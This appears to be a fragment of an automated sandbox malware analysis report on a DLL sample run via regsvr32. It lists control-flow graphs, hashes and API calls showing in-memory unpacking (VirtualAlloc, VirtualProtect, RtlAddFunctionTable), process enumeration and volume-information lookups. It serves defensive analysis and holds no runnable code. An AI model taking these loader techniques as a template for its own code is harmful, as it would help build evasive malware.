                                                                                                    • TlsSetValue.KERNEL32(?,?,00000000,0000000180003AEE,?,?,?,0000000180003651,?,?,?,?,00000001800012B5), ref: 0000000180007818
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Valuetry_get_function
                                                                                                    • String ID: FlsSetValue
                                                                                                    • API String ID: 738293619-3750699315
                                                                                                    • Opcode ID: 49251b306acbffe2f9108142d147379c41fb3e20f7955e7a8130f6a3d896cc4c
                                                                                                    • Instruction ID: 683fccaae1615db25d13ae45dcc30c2cf33272b140b8a6a74d38529c2b7b2474
                                                                                                    • Opcode Fuzzy Hash: 49251b306acbffe2f9108142d147379c41fb3e20f7955e7a8130f6a3d896cc4c
                                                                                                    • Instruction Fuzzy Hash: A6E0657170890891FE968B54F8843D43271E78C7D4F99C021B90906295CE3CC68DC358
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:14%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:36
                                                                                                    Total number of Limit Nodes:2
                                                                                                    execution_graph 3398 840000 3403 84015a 3398->3403 3399 8408eb 3400 84033f GetNativeSystemInfo 3400->3399 3401 840377 VirtualAlloc 3400->3401 3402 840395 VirtualAlloc 3401->3402 3404 8403aa 3401->3404 3402->3404 3403->3399 3403->3400 3405 840873 3404->3405 3407 84084b VirtualProtect 3404->3407 3405->3399 3406 8408c6 RtlAddFunctionTable 3405->3406 3406->3399 3407->3404 3422 2065920 3424 2065961 3422->3424 3423 2065bed 3424->3423 3426 2076938 3424->3426 3427 20698c8 Process32FirstW 3426->3427 3428 2076a00 3427->3428 3428->3424 3429 2088ca0 3432 2088cc5 3429->3432 3430 2076938 Process32FirstW 3430->3432 3431 2088f09 3432->3430 3432->3431 3433 20719cc 3436 2071a09 3433->3436 3434 2076938 Process32FirstW 3434->3436 3435 2071b20 3436->3434 3436->3435 3408 2079318 3409 2079431 3408->3409 3410 20796b9 3409->3410 3412 2085f74 3409->3412 3414 208600c 3412->3414 3413 20860f0 GetVolumeInformationW 3413->3410 3414->3413 3415 2076938 3418 20698c8 3415->3418 3417 2076a00 3419 20698f9 3418->3419 3420 2069b56 Process32FirstW 3419->3420 3421 2069960 3419->3421 3420->3419 3421->3417

                                                                                                    Executed Functions

                                                                                                    Function 00840000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 840000-84029a call 84091c * 2 13 840905 0->13 14 8402a0-8402a4 0->14 15 840907-84091a 13->15 14->13 16 8402aa-8402ae 14->16 16->13 17 8402b4-8402b8 16->17 17->13 18 8402be-8402c5 17->18 18->13 19 8402cb-8402dc 18->19 19->13 20 8402e2-8402eb 19->20 20->13 21 8402f1-8402fc 20->21 21->13 22 840302-840312 21->22 23 840314-84031a 22->23 24 84033f-840371 GetNativeSystemInfo 22->24 26 84031c-840324 23->26 24->13 25 840377-840393 VirtualAlloc 24->25 27 840395-8403a8 VirtualAlloc 25->27 28 8403aa-8403ae 25->28 29 840326-84032a 26->29 30 84032c-84032d 26->30 27->28 31 8403b0-8403c2 28->31 32 8403dc-8403e3 28->32 33 84032f-84033d 29->33 30->33 34 8403d4-8403d8 31->34 35 8403e5-8403f9 32->35 36 8403fb-840417 32->36 33->24 33->26 37 8403c4-8403d1 34->37 38 8403da 34->38 35->35 35->36 39 840458-840465 36->39 40 840419-84041a 36->40 37->34 38->36 42 840537-840542 39->42 43 84046b-840472 39->43 41 84041c-840422 40->41 45 840424-840446 41->45 46 840448-840456 41->46 47 8406e6-8406ed 42->47 48 840548-840559 42->48 43->42 44 840478-840485 43->44 44->42 50 84048b-84048f 44->50 45->45 45->46 46->39 46->41 51 8406f3-840707 47->51 52 8407ac-8407c3 47->52 49 840562-840565 48->49 53 840567-840574 49->53 54 84055b-84055f 49->54 55 84051b-840525 50->55 56 84070d 51->56 57 8407a9-8407aa 51->57 58 8407c9-8407cd 52->58 59 84087a-84088d 52->59 60 84060d-840619 53->60 61 84057a-84057d 53->61 54->49 64 840494-8404a8 55->64 65 84052b-840531 55->65 62 840712-840736 56->62 57->52 63 8407d0-8407d3 58->63 80 8408b3-8408ba 59->80 81 84088f-84089a 59->81 72 8406e2-8406e3 60->72 73 84061f 60->73 61->60 68 840583-84059b 61->68 89 840796-84079f 62->89 90 840738-84073e 62->90 70 84085f-84086d 63->70 71 8407d9-8407e9 63->71 66 8404cf-8404d3 64->66 67 8404aa-8404cd 64->67 65->42 65->50 76 8404d5-8404e1 66->76 77 8404e3-8404e7 66->77 75 840518-840519 67->75 68->60 78 84059d-84059e 68->78 70->63 74 840873-840874 70->74 82 84080d-84080f 71->82 83 8407eb-8407ed 71->83 72->47 84 840625-840648 73->84 74->59 75->55 85 840511-840515 76->85 87 8404fe-840502 77->87 88 8404e9-8404fc 77->88 86 8405a0-840605 78->86 94 8408bc-8408c4 80->94 95 8408eb-840903 80->95 91 8408ab-8408b1 81->91 96 840811-840820 82->96 97 840822-84082b 82->97 92 8407ef-8407f9 83->92 93 8407fb-84080b 83->93 111 8406b2-8406b7 84->111 112 84064a-84064b 84->112 85->75 86->86 98 840607 86->98 87->75 105 840504-84050e 87->105 88->85 89->62 104 8407a5-8407a6 89->104 99 840740-840746 90->99 100 840748-840754 90->100 91->80 101 84089c-8408a8 91->101 106 84082e-84083d 92->106 93->106 94->95 103 8408c6-8408e9 RtlAddFunctionTable 94->103 95->15 96->106 97->106 98->60 108 84077b-84078d 99->108 109 840764-840776 100->109 110 840756-840757 100->110 101->91 103->95 104->57 105->85 113 84083f-840845 106->113 114 84084b-84085c VirtualProtect 106->114 108->89 125 84078f-840794 108->125 109->108 116 840759-840762 110->116 118 8406ce-8406d8 111->118 119 8406b9-8406bd 111->119 117 84064e-840651 112->117 113->114 114->70 116->109 116->116 122 840653-840659 117->122 123 84065b-840666 117->123 118->84 124 8406de-8406df 118->124 119->118 120 8406bf-8406c3 119->120 120->118 129 8406c5 120->129 126 84068d-8406a3 122->126 127 840676-840688 123->127 128 840668-840669 123->128 124->72 125->90 132 8406a5-8406aa 126->132 133 8406ac 126->133 127->126 130 84066b-840674 128->130 129->118 130->127 130->130 132->117 133->111
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.573563358.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_840000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                    • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                    • API String ID: 394283112-3605381585
                                                                                                    • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                    • Instruction ID: f93936178e5dfecad2ba510f8de542be76c93d6e1960c554a5c785623748cf43
                                                                                                    • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                    • Instruction Fuzzy Hash: DE520330618B4C8BDB19DF18D8856BAB7E1FB94305F14462DE98BC7251EB34E942CF86
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02085F74 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 623 2085f74-208602b call 2074df4 626 20860f0-208612b GetVolumeInformationW 623->626 627 2086031-20860ea call 2087f00 623->627 627->626
                                                                                                    APIs
                                                                                                    • GetVolumeInformationW.KERNELBASE ref: 02086111
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.573888713.0000000002061000.00000020.00001000.00020000.00000000.sdmp, Offset: 02061000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_2061000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InformationVolume
                                                                                                    • String ID: |k
                                                                                                    • API String ID: 2039140958-406035669
                                                                                                    • Opcode ID: f4a82254235d292a0ed8ec98dba5ba6ed40e15c1916d3402663e9666fcf7706c
                                                                                                    • Instruction ID: 42edfa17f1ae17540009674db1dfbbedb34208708db7952a2d45fb80421b68e7
                                                                                                    • Opcode Fuzzy Hash: f4a82254235d292a0ed8ec98dba5ba6ed40e15c1916d3402663e9666fcf7706c
                                                                                                    • Instruction Fuzzy Hash: 1F41297061C7848FD7A8DF28D48579AB7E1FB88314F508A2DE88DC7395CB749884CB46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%